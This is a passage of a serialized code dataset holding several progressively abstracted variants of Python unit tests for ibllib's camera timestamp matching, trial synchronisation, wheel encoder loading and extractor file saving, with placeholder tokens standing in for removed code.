10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n <function token>\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestWheelLoaders(unittest.TestCase):\n <function token>\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestWheelLoaders(unittest.TestCase):\n <function token>\n <function token>\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 